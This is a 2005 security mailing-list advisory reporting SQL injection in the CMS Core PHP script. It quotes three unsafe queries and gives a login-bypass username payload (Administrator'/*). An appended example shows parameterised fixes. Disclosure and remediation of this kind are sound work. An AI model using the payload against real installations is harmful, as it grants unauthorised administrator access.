Message-ID: <20050209141547.28518.qmail@www.securityfocus.com>
Date: 9 Feb 2005 14:15:47 -0000
From: foster GHC <foster@....ru>
To: bugtraq@...urityfocus.com
Subject: CMS Core SQL injection




// GHC -> CMS CORE <- ADVISORY
// Product: CMS Core
// URL: http://chipmunk-scripts.com/scripts/cmscore.php
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[1] script name: index.php

---[code]---
$EntryID=$_GET['EntryID'];
...
$article="SELECT * FROM CMS_articles where EntryID='$EntryID'";
---[/code]---

Possible SQL injection: http://CMScore/index.php?EntryID=[SQL code]

[2] script name: index.php

---[code]---
$searchterm=$_POST[searchterm];
...
$newselect="Select * FROM CMS_articles where title LIKE %$searchterm% OR shortdescription 
LIKE %$searchterm% OR body LIKE %$searchterm% order by EntryID DESC LIMIT $start, 
$numentries";
---[/code]---

Possible SQL injection through $searchterm variable in Search form.

[3] script name: admin/authenticate.php

---[code]---
  $username=$_POST['username'];
  $password=$_POST['password'];
  $password=md5($password);
  $query = "select * from CMS_logintable where username='$username' and password='$password'"; 
  $result=mysql_query($query) or die("Could not Query");
---[/code]---

Possible SQL injection through $username variable.

[exploit]
Log in with username
Administrator'/*
from admin/index.php page.

[note]
"Administrator" must be a valid user name.

/* ================================================== */
/* www.ghc.ru -- security games & challenges */
/* ================================================== */
/* greets to: 1dt.w0lf & RST.void.ru, D0G4 */
/* & all quest hunters %) */
/* ================================================== */
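
The three queries quoted in the advisory, rewritten with bound parameters so that request input is always treated as data. This is an added example, not part of the original post or of CMS Core's code; the in-memory SQLite schema, the sample rows, the function names and the use of password_hash() in place of md5() are assumptions made for illustration.

```php
<?php
// Added example. An in-memory SQLite database stands in for the CMS Core MySQL
// tables; schema, rows and function names are constructed for illustration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE CMS_logintable (username TEXT, password TEXT)");
$db->exec("CREATE TABLE CMS_articles (EntryID INTEGER PRIMARY KEY,
           title TEXT, shortdescription TEXT, body TEXT)");
$db->prepare("INSERT INTO CMS_logintable VALUES (?, ?)")
   ->execute(['Administrator', password_hash('sample-pass', PASSWORD_DEFAULT)]);
$ins = $db->prepare("INSERT INTO CMS_articles (title, shortdescription, body) VALUES (?, ?, ?)");
$ins->execute(['100% uptime', 'status', 'all systems normal']);
$ins->execute(['Release notes', 'changes', 'nothing special']);

// [1] EntryID: accept integers only, and bind the value anyway.
function fetchArticle(PDO $db, $entryId): ?array {
    $id = filter_var($entryId, FILTER_VALIDATE_INT);
    if ($id === false) return null;
    $st = $db->prepare("SELECT * FROM CMS_articles WHERE EntryID = ?");
    $st->execute([$id]);
    return $st->fetch(PDO::FETCH_ASSOC) ?: null;
}

// [2] Search: bind the term (LIKE wildcards escaped with '!') and bind the
// LIMIT values as integers.
function searchArticles(PDO $db, string $term, int $start, int $numentries): array {
    $like = '%' . strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';
    $st = $db->prepare("SELECT * FROM CMS_articles WHERE title LIKE :t ESCAPE '!'
        OR shortdescription LIKE :s ESCAPE '!' OR body LIKE :b ESCAPE '!'
        ORDER BY EntryID DESC LIMIT :start, :n");
    foreach ([':t', ':s', ':b'] as $p) $st->bindValue($p, $like, PDO::PARAM_STR);
    $st->bindValue(':start', max(0, $start), PDO::PARAM_INT);
    $st->bindValue(':n', max(1, $numentries), PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// [3] Login: look the user up by bound username, verify the hash in PHP.
function authenticate(PDO $db, string $username, string $password): bool {
    $st = $db->prepare("SELECT password FROM CMS_logintable WHERE username = ?");
    $st->execute([$username]);
    $hash = $st->fetchColumn();
    return is_string($hash) && password_verify($password, $hash);
}

var_dump(authenticate($db, "Administrator'/*", 'anything'));   // username string from the advisory
var_dump(authenticate($db, 'Administrator', 'sample-pass'));   // constructed valid credentials
var_dump(fetchArticle($db, 'abc'));                            // constructed non-numeric EntryID
var_dump(count(searchArticles($db, '%', 0, 10)));              // literal '%' search term
```

With binding in place, the username from the advisory is compared as a literal string, so the quote and comment marker never reach the SQL parser as syntax.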

